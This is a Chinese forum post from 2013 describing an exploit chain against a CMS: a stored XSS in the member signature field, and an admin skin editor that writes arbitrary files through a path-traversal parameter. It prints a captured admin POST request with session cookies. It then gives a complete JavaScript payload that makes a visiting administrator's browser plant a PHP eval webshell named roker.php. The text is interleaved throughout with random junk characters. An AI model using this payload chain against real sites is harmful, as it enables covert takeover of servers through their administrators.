|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题" T7 v9 \: s! ]9 |1 D- ~# b/ E% L
官网已经修补了,所以重新下了源码
; X0 A0 k# j w* t# c因为 后台登入 还需要认证码 所以 注入就没看了。3 Z1 A6 s, _: Z/ }
存在 xss' @. f+ d8 O3 i P
漏洞文件 user/member/skin_edit.php
: e$ S' y' |5 P9 z本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:" K2 e6 a+ o* y" O; d3 ^' A
' s, X& @; Y2 I& V/ z) R
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
6 V2 n! |* D8 o9 ]: M : m( H( U7 j; E' d. f
</textarea></td></tr>
: A7 r6 f2 z! `, |6 Q! A& u& T
9 X% W! V% K9 t user/do.php ; s. l; R2 l- i Z8 t8 u" V
P2 S% e: B7 t& s) w/ \' C$ v: Y- V6 t9 \3 s5 @2 \5 @: i
if($op=='zl'){ //资料
9 a: ^) A. S8 m( C
d) R. v* E- z if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ; N8 S- h' ^) r3 O
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));- | A# K9 c- x) ~/ n' H
K5 q1 \3 c, V# W $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',$ A+ @& ^" p" K9 Q
- G ]+ x; [: f! m' b% D, R CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
/ C. y( Y# J7 i0 W4 m7 J% o+ V where CS_Name='".$cscms_name."'";
2 Z2 P* L" o! W% p
% @; Y% c' r6 S$ v# o5 h if($db->query($sql)){# a$ `2 y* w3 Q' n
. F$ B2 x$ M0 ^' s1 z+ u# l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
/ n* p7 l! [% B; R7 y
1 Q9 d- t; r9 K+ z( V }else{
. K& W4 ~7 i' f/ H# N, R: f/ F
# s3 l- `/ |1 p exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));4 q: V @( T" f0 h0 U
; W! B- f' @% z( }% o
}" v& R% |( c! N" U0 h' G( R+ t
" W$ E" G) U/ h' m
T1 [. C1 c% U! \- q没有 过滤导致xss产生。 B6 \9 ^( @( K
后台 看了下 很奇葩的是可以写任意格式文件。。" n: C+ ?7 u# x" _5 V/ Y0 j
抓包。。1 u; Z, M+ Y N9 B* y
4 {# k9 a: B- }1 x5 L$ ~4 B% G, b9 R
4 h0 s" I; ?2 g- p/ e; h8 \本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.15 v$ t' H; O) u, V8 O
M6 c9 k% t0 J& g8 O9 t# HAccept: text/html, application/xhtml+xml, */*
, K% |+ }1 c! m1 d) ? ; p" h) o0 A; `4 `2 {1 h" R. c
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php% ]) E: \' l. o3 l1 w* }
- B4 @# N9 \, f0 E9 M2 A
Accept-Language: zh-CN
8 @" R; _% j: w( y, f % P% h& c. s/ C) {
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)+ v) C% @, T4 i6 e m1 N6 v
& C" I2 w; `7 i$ B/ o, i. A
Content-Type: application/x-www-form-urlencoded$ K; L4 K$ V6 V# X
& p0 P$ C* X+ e% M" b: W' b0 ]Accept-Encoding: gzip, deflate& H) _! n. g( h1 b( q) ]; i
$ n( i7 M; B) ]* {' p! Q% mHost: 127.0.0.1/ s9 Q/ G% u# M
* Z x1 z4 y2 N$ L+ d" I
Content-Length: 38
E' H+ ^" `. a) ?# s . l5 j, P8 @$ Z5 K
DNT: 1& Z9 _+ Q7 q+ C) ? M& h7 c6 G
- C/ `) q" H4 I' N* w3 `
Connection: Keep-Alive) R9 u0 @& z2 M y: h \& B% V
: \: `, K5 |3 o# n
Cache-Control: no-cache
% `7 t7 b0 J/ K, Z+ @3 _ 4 g. Q: U' Z, f% g
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
0 h$ n( S% b/ R6 u; J8 u/ l% [7 \ # b/ ?2 w! f3 \0 d
3 H2 p) Q$ ^% |- h& ~" Z9 V, h4 cname=aaa.php&content=%3Cs%3E%3Ca%25%3E) D, `; v8 l* S/ V% h' B
f. ]& R: H2 M" G
; B1 ~2 \! B8 Z6 \! ~
& ~2 g, ?0 [$ t% A; Z. s9 K' q于是 构造js如下。6 B1 [ Y' b8 U$ O
" i: [7 H R! k: s
本帖隐藏的内容<script>
5 N! z5 e$ ]+ L$ athisTHost = top.location.hostname;3 k" \ U4 v/ A8 _
& ~6 p; H) R D z. VthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";$ J; B& a7 [3 N1 M% ~ s+ D8 {
: Q6 Z; Q- [: e, q- b
function PostSubmit(url, data, msg) {
# W4 `7 t, s. Z. A' C s" z var postUrl = url;: `4 t6 S5 y5 J
0 q( ^' F6 y( h$ z/ O3 E
var postData = data;
4 `- ]0 w5 y9 `. @- S3 C' Z5 N var msgData = msg;
9 o: h# [6 ` j a# p% J% @/ l" r. A var ExportForm = document.createElement("FORM");
" `2 V% c8 _" v+ x# U* J document.body.appendChild(ExportForm); + I& t7 S2 h4 N( H+ _; k: S
ExportForm.method = "POST"; 1 A$ c( r( {8 l1 H. E
var newElement = document.createElement("input"); : h1 Y1 z i2 @+ ~; M
newElement.setAttribute("name", "name");
) z$ J j `3 v0 j* p4 O$ a newElement.setAttribute("type", "hidden");
3 T8 d$ D1 T8 T9 H" c var newElement2 = document.createElement("input");
' o+ G# j+ N) N3 t, n newElement2.setAttribute("name", "content"); 3 Y+ P8 ?1 F' x, u2 O, V) C7 P. X
newElement2.setAttribute("type", "hidden"); # T% s* n' F* P2 A( z
ExportForm.appendChild(newElement); $ }, p8 |- G M8 W% B
ExportForm.appendChild(newElement2);
0 M# X' h- A$ x) S. u newElement.value = postData;
$ D$ R* O, C" s; D: b% h4 x7 q newElement2.value = msgData;
7 Z; Z0 ~9 Z; U* L2 l# P3 i ExportForm.action = postUrl;
) m+ G V7 T5 A+ n ExportForm.submit();
/ O1 G5 J$ W; A) W: Y/ N};* y* I" ^. L* S) _2 f5 p- z$ L
+ N! B( |/ X. y' a0 Q0 pPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");5 E5 Q3 c- I0 ]2 w- Z' g* D- U
* E9 `/ r9 L) B" R" b: z
</script>
2 ]2 F) d* ~& ?2 C: X6 V
+ O3 a, {& ^3 W P, w6 V& P
+ Y( K, x& o G& i: I6 E
3 {6 Q/ ^6 j! m+ }9 bhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* D) c& K' D8 Z7 W用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
O, `) `3 v/ P/ x# n8 t就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
$ O" }" e7 j4 ^" r |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对